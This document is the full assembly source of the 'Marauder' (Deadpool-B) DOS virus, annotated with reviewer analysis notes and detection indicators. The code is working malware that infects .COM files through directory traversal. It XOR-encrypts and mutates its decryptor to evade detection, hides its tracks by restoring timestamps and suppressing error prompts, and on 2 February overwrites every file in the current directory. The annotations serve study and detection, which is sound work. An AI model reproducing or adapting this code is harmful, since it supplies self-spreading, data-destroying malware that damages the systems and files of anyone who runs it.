; "Marauder" Virus
; AKA Deadpool-B
;
; By Hellraiser
; Of Phalcon/Skism
;
; For virus research only
;
; I always wanted to release this source, so here it is. Now that it's been caught
; take a look at whats inside.
;
; I know it's no great thing, but it's good to learn from. It contains basic
; encryption, mutation, and INT 24 handling.
;
; I will be very upset if I see 100 new versions of this code with some lame kids
; name in place of mine. So just use it to learn from, it's very straight foward.
;
;-----------------------------------------------------------------------
; NOTE(review): analysis notes for this listing (MASM/TASM Intel syntax,
; 16-bit MS-DOS .COM appender, org 100h).  Line breaks were lost in the
; copy this was taken from; they are reconstructed here and the code
; tokens are otherwise unchanged.  Two lone ';' markers are read as empty
; trailing comments (the author's commented-out code always has no space
; after ';'), so `stosw` in enc_enc and the r_loop label are live.
;
; Structure, as the code below shows it:
;   * bodystart..bodyend is appended to victims; the 4-byte header
;     `E9 lo hi 88h` (newjmp) replaces the host's first 4 bytes, which are
;     kept in oldjmp/thisjmp and restored at 100h before control returns.
;   * The region mixed_up..bodyend is XOR-encrypted word-wise with
;     enc_code (a key taken from the DOS time, INT 21h/2Ch).  The key sits
;     in the clear right after `jmp chris`, so the body can be decoded
;     statically.
;   * "Mutation": the decryptor's prologue (part1_) and epilogue (done_)
;     are swapped between two pre-written variants (part1/part2 or
;     parta/partb), and the variant store is itself XOR'd with mutantcode
;     (enc_code byte-rotated).  The lodsw/xor/stosw/loop core is constant.
;   * INT 24h is pointed at newint24, which returns AL=0 (ignore), so DOS
;     critical-error prompts are suppressed while infecting.
;   * Targets: *.COM in the current dir, then each parent up to the root,
;     then one subdirectory pass.  Skipped: files already carrying 88h at
;     offset 3, 'MZ' headers, size < 16 or >= toolarge.  Attributes and
;     date/time are restored after writing.
;   * Payload: on Feb 2 (INT 21h/2Ah returns DX=0202h) every file in the
;     current directory is overwritten with repeated copies of idbuffer.
;
; Indicators a defender can use: E9 at offset 0 with 88h at offset 3 of a
; .COM; growth by exactly bodylength + 5 bytes; the idbuffer text is
; encrypted on disk but visible in memory and in overwritten files.
;-----------------------------------------------------------------------

code    segment 'code'
        assume  cs:code, ds:code, ss:code, es:code
        org     0100h

; Scratch areas live past endcode (beyond what is written to the file).
dta             EQU endcode + 10        ; private DTA for the *.COM search
headlength      EQU headend - headstart
bodylength      EQU bodyend - bodystart
encryptpart     EQU bodyend - mixed_up  ; bytes covered by the XOR layer
part1size       EQU part2 - part1       ; must equal size of part1_..done_
part2size       EQU parta - part2       ; must equal size of done_..ret
partasize       EQU partb - parta
partbsize       EQU dude - partb
mutants         EQU chris - part1       ; variant store, XOR'd with mutantcode
total_mutant    EQU mutants / 2
encryptlength   EQU encryptpart / 2     ; words, not bytes
virus_size      EQU headlength + bodylength + 5 ; head + body + int24 + 2
drive           EQU endcode + 110       ; "X:\<orig_path>" is built here
backslash       EQU endcode + 111
orig_path       EQU endcode + 113
dirdta          EQU orig_path + 66      ; DTA for the *.* directory search
myid            EQU 88h                 ; infection marker at file offset 3
toolarge        EQU 65535 - virus_size
; offsets inside a DOS DTA / find record
fileattr        EQU 21
filetime        EQU 22
filedate        EQU 24
filename        EQU 30

; First-generation host: jmp + marker, then a stub that just exits.
headstart:
        jmp     bodystart
        db      myid
headend:

realprogramstart:
        db      90h, 90h, 90h
        db      0cdh, 020h, 1ah, 1ah    ; nop nop nop / int 20h / filler
realprogramend:

;-----------------------------------------------------------------------
; Entry in an infected host.  Computes the load delta into SI (all data
; below is addressed as [si + label]), decrypts the body, jumps to chris.
;-----------------------------------------------------------------------
bodystart:
        call    deadpool
deadpool:
        pop     si
        sub     si,offset deadpool      ; si = delta from assembled offsets
        call    encrypt                 ; XOR is symmetric: this decrypts
        jmp     chris
enc_code dw 0000h                       ; XOR key, stored in the clear

;-----------------------------------------------------------------------
; encrypt: XOR encryptlength words ending at [si+bodyend] with enc_code,
; walking backwards (DF=1).  part1_..done_ and done_..ret are overwritten
; with one of the variant pairs below at infection time; only the
; xor_loop core is fixed.  Leaves DF set.
;-----------------------------------------------------------------------
encrypt proc near
        assume  cs:code, ds:code, es:code, ss:code
part1_:
        push    ax
        push    bx
        push    cx
        push    dx
        mov     cx, encryptlength
        mov     bp, si                  ; bp = delta, used for [bp+enc_code]
        add     si, offset bodyend
        mov     di,si
        std
xor_loop:
        lodsw
        xor     ax, [bp + enc_code]
        stosw
        loop    xor_loop
done_:
        mov     si, bp
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        ret
;nop
encrypt endp

;-----------------------------------------------------------------------
; infect: issue the INT 21h already set up by the caller (AH=40h write)
; with the body temporarily encrypted, so the file gets the encrypted
; form and memory is restored afterwards.  CF from the write survives.
;-----------------------------------------------------------------------
infect proc near
        call    encrypt
        int     21h
        call    encrypt
        ret
infect endp

;-----------------------------------------------------------------------
; Variant store (never executed here; copied over part1_/done_ by
; dostring).  Variant A walks forward from mixed_up, variant B walks
; backward from endcode.  Each pair must assemble to part1size/part2size.
;-----------------------------------------------------------------------
mixed_up:
part1:                                  ; variant A prologue
        push    dx
        push    cx
        push    bx
        push    ax
        mov     cx, encryptlength
        mov     bp, si
        add     si, offset mixed_up
        mov     di,si
        cld
part2:                                  ; variant A epilogue
        mov     si, bp
        pop     ax
        pop     bx
        pop     cx
        pop     dx
parta:                                  ; variant B prologue
        mov     bp, si
        add     si, offset endcode
        mov     di, si
        push    ax
        push    bx
        push    cx
        push    dx
        mov     cx, encryptlength
        std
partb:                                  ; variant B epilogue
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        mov     si, bp
dude:
; don't get any ideas lamer
; idbuffer starts with `int 20h`, so a file overwritten by the payload
; simply terminates when run.  stringsize counts the 2 opcode bytes too.
hellraiser label byte
idbuffer db 0cdh, 20h,' [Marauder] 1992 Hellraiser - Phalcon/Skism. '
stringsize EQU ($ - hellraiser)

;-----------------------------------------------------------------------
; chris: main flow after decryption.
;   1. hook INT 24h (critical-error handler) -> newint24
;   2. save current drive + directory as "X:\path" at [si+drive]
;   3. copy the host's original 4 header bytes (oldjmp) to thisjmp
;   4. search/infect, then restore and run the host
;-----------------------------------------------------------------------
chris:
        push    es
        mov     ax,3524h                ; get INT 24h vector -> es:bx
        int     21h
        mov     [si + word ptr oint24], bx
        mov     [si + word ptr oint24 + 2], es
        pop     es
        mov     ax, 2524h               ; set INT 24h -> newint24
        lea     dx, [si + newint24]
        int     21h
        push    si
        mov     ah, 47h                 ; get current dir (dl=0: default drive)
        xor     dl,dl
        add     si, offset orig_path    ; ds:si = buffer
        int     21h
        pop     si
        mov     ah,19h                  ; get current drive (0-based)
        int     21h
        add     al, 41h                 ; -> 'A'..
        mov     byte ptr [si + offset drive], al
        mov     ax, '\:'                ; stores ":\" after the drive letter
        mov     word ptr [si + offset backslash], ax
;mov byte ptr [si + offset defaultdrive], al
; here's my new tri-dimensional jmp displacement theory in play
        push    si
        pop     bp
        lea     si, [bp + offset oldjmp]
        lea     di, [bp + offset thisjmp]
        mov     cx,04h
        cld
        rep     movsb
        push    bp
        pop     si
why:
        mov     ah,1ah                  ; DTA = private dta
        lea     dx,[si + dta]
        int     21h
        mov     ah,2ah                  ; get date: dh=month, dl=day
        int     21h
        cmp     dx, 0202h               ; Feb 2 -> destructive payload
        jne     ff
        jmp     smash
ff:
        mov     ah,4eh                  ; find first *.COM
        lea     dx,[si + filespec]
        mov     cx, 07h                 ; incl. read-only/hidden/system
searchloop:
        int     21h
        jnc     here                    ; candidate found
;jmp up
        ; no more .COM here: move to the parent directory and retry
        mov     ah,1ah
        lea     dx,[si + dirdta]
        int     21h
        mov     ah,3bh                  ; chdir ".."
        lea     dx,[si + offset rootdir]
        int     21h
        jc      at_root
        jmp     why
at_root:
        ; one pass into subdirectories, guarded by donebefore
        cmp     byte ptr [si + donebefore], 01h
        je      notokey
        mov     al,01h
        mov     [si + donebefore], al
        mov     ah,4eh                  ; find first *.* (dirs, hidden, r/o)
        xor     cx,cx
        mov     cl,13h
        lea     dx, [si + dwildcards]
ffdloop:
        int     21h
        jnc     okey
        jmp     far ptr nofilesfound
notokey:
        mov     ah,4fh                  ; find next
        jmp     ffdloop
okey:
        mov     ah,3bh                  ; chdir into the found entry
        lea     dx, [si + offset dirdta + filename]
        int     21h
        jc      notokey                 ; not a directory: keep looking
        jmp     why
here:
        ; candidate .COM: save attributes, strip them, open read/write,
        ; save date/time, read the first 4 bytes and test the marker.
        mov     bx, word ptr [si + offset dta + fileattr]
        mov     word ptr [si + origattr], bx
        mov     ax,4301h                ; set attributes = 0
        xor     cx,cx
        lea     dx, [si + offset dta + filename]
        int     21h
        jc      bad_file2
        call    openfile
        jc      bad_file2
        mov     word ptr [si + offset handle], ax
        mov     bx, word ptr [si + offset dta + filedate]
        mov     word ptr [si + origdate], bx
        mov     bx, word ptr [si + offset dta + filetime]
        mov     word ptr [si + origtime], bx
        xchg    bx, ax                  ; bx = handle
        mov     ah, 3fh                 ; read 4 bytes -> oldjmp
        mov     cx, 4
        lea     dx, [si + oldjmp]
        int     21h
        cmp     byte ptr [si + offset oldjmp + 3], myid
        jne     sick_of_it_all          ; not yet infected
bad_file:
        ; already infected / unsuitable: restore attributes, close
        mov     ax,4301h
        mov     cx, word ptr [si + offset origattr]
        lea     dx, [si + offset dta + filename]
        xor     ch,ch
        int     21h
        mov     ah,3eh
        int     21h
bad_file2:
        cmp     ax, 05h                 ; access denied
        je      dumb
        cmp     ax, 02h                 ; file not found
        je      dumb
        mov     ah, 4fh                 ; otherwise find next
        jmp     searchloop
dumb:
        jmp     nofilesfound
sick_of_it_all:
        cmp     word ptr [si + offset oldjmp], 5a4dh ; 'MZ' (EXE): skip
        je      bad_file
        call    seekeof                 ; ax = file size (low word)
        cmp     ax,0010h
        jb      bad_file
        cmp     ax, toolarge
        jae     bad_file
        ; build the new header: E9 <size-3> 88h
        sub     ax,03h
        mov     [si + newjmp + 2], ah
        mov     [si + newjmp + 1], al
        mov     [si + newjmp + 3], myid
        mov     ah, 0e9h
        mov     [si + newjmp], ah
        xor     al,al
        mov     [si + donebefore], al
        inc     word ptr [si + generation]
        mov     bp, si
        call    enc_enc                 ; expose the variant store
tryagain:
        mov     ah,2ch                  ; get time; dx used as the key
        int     21h
        cmp     dx, 0000h               ; never use a zero key
        je      tryagain
        mov     word ptr [si + offset enc_code], dx
        mov     cl, 8
        ror     dx, cl                  ; byte-swapped key for the store
        mov     word ptr [si + offset mutantcode], dx
        cmp     dl, 30                  ; pick decryptor variant by key byte
        jng     encrypt_a
        jmp     encrypt_b
encrypt_a:
;mov bp, si
        lea     si,[bp + offset part1]
        lea     di,[bp + offset part1_]
        mov     cx, part1size
        call    dostring
        lea     si,[bp + offset part2]
        lea     di,[bp + offset done_]
        mov     cx, part2size
        call    dostring
        jmp     attach
encrypt_b:
        lea     si,[bp + offset parta]
        lea     di,[bp + offset part1_]
        mov     cx, part1size
        call    dostring
        lea     si,[bp + offset partb]
        lea     di,[bp + offset done_]
        mov     cx, part2size
        call    dostring
attach:
        call    enc_enc                 ; re-cover the store with new key
        mov     si,bp
        mov     ah,40h                  ; write body at EOF (via infect)
        mov     cx, bodyend - bodystart
        add     cx, 5
        lea     dx,[si + bodystart]
        call    infect
        jc      close_file
        call    seektof
        mov     ah,40h                  ; write the 4-byte jmp header
        mov     cx, 4
        lea     dx,[si + offset newjmp]
        int     21h
close_file:
        mov     ax,5701h                ; restore file date/time
        mov     cx, word ptr [si + offset origtime]
        mov     dx, word ptr [si + offset origdate]
        mov     bx, word ptr [si + offset handle]
        int     21h
        mov     ah, 3eh
        int     21h
        mov     ax,4301h                ; restore attributes
        mov     cx, word ptr [si + offset origattr]
        lea     dx, [si + offset dta + filename]
        xor     ch,ch
        int     21h
nofilesfound:
        mov     ah, 03bh                ; chdir back to "X:\orig_path"
        lea     dx, [si + offset drive]
        int     21h
restoredta:
        mov     ah, 1ah                 ; DTA back to the PSP default
        mov     dx, 080h
        int     21h
        push    si
        pop     bp
        mov     ax, 2524h               ; restore INT 24h
        lea     dx, [si + oint24]
        int     21h
        lea     si,[bp + offset thisjmp] ; put host's 4 bytes back at 100h
        mov     di,100h
        mov     cx,04h
        cld
        rep     movsb
        mov     di, 0100h
        jmp     di                      ; run the host

;-----------------------------------------------------------------------
; smash: payload.  For every file matching *.* in the current directory,
; call kill; ends by falling into restoredta when the search is done.
;-----------------------------------------------------------------------
smash proc near
        call    enc_enc
        mov     ah, 4eh
        mov     cx, 07h
        lea     dx, [si + offset dwildcards]
        ; find first, then find next until CF
r_loop:
        int     21h
        jc      restoredta
        call    kill
        mov     ah, 4fh
        jmp     r_loop
smash endp

; dostring: copy cx bytes ds:si -> es:di, forward.
dostring proc near
        cld
        rep     movsb
        ret
dostring endp

;-----------------------------------------------------------------------
; enc_enc: XOR total_mutant words at [bp+part1] with mutantcode, forward.
; Expects bp = delta and DF=0; returns si = bp.  Symmetric.
;-----------------------------------------------------------------------
enc_enc proc near
        mov     si, bp
        add     si, offset part1
        mov     di, si
        mov     cx, total_mutant
loop_xor:
        lodsw
        xor     ax, [bp + mutantcode]
        ; see the header note: stosw is taken as live
        stosw
        loop    loop_xor
        mov     si, bp
        ret
enc_enc endp

; seektof: lseek(bx, 0, SEEK_SET)
seektof proc near
        mov     ax,4200h
        xor     cx,cx
        xor     dx,dx
        int     21h
        ret
seektof endp

; seekeof: lseek(bx, 0, SEEK_END); returns size in dx:ax
seekeof proc near
        mov     ax,4202h
        xor     dx,dx
        xor     cx,cx
        int     21h
        ret
seekeof endp

; openfile: open [si+dta+filename] read/write; ax = handle, CF on error
openfile proc near
        mov     ax,3d02h
        lea     dx, [si + offset dta + filename]
        int     21h
        ret
openfile endp

;-----------------------------------------------------------------------
; kill: overwrite the current find-record file with idbuffer repeated
; (filesize / stringsize) times from offset 0, then close it.
;-----------------------------------------------------------------------
kill proc near
        call    openfile
        jc      return
        mov     bx, ax
        push    bx
        call    seekeof
        mov     bx, stringsize
        div     bx                      ; ax = dx:ax / stringsize
        mov     cx, ax
        pop     bx                      ; bx = handle again
        push    cx
        call    seektof
        pop     cx
loop_:
        push    cx
        mov     ah, 40h
        mov     cx, stringsize
        lea     dx, [si + offset idbuffer]
        int     21h
        jc      ender
        pop     cx
        dec     cx
        jcxz    ender
        jmp     loop_
ender:
        mov     ah, 3eh
        int     21h
return:
        ret
kill endp

; Data carried inside the encrypted body.
filespec db '*.COM',0
dwildcards db '*.*',0
rootdir db '..',0
generation dw 0000                      ; incremented per infection
origdate dw ?
origtime dw ?
origattr db ?                           ; written/read as a word by the code above
handle dw ?
defaultdrive db ?
oldjmp db 09h, 0cdh, 020h, 90h          ; host's original first 4 bytes
thisjmp db 4 dup (?)
newjmp db 4 dup (?)                     ; E9 lo hi 88h
mutantcode dw 0000
donebefore db 00
oint24 dd 00                            ; saved INT 24h vector
bodyend:
; not encrypted
; newint24: critical-error handler that always answers AL=0 (ignore).
newint24:
        xor     al,al
        iret
endcode:
code ends
        end headstart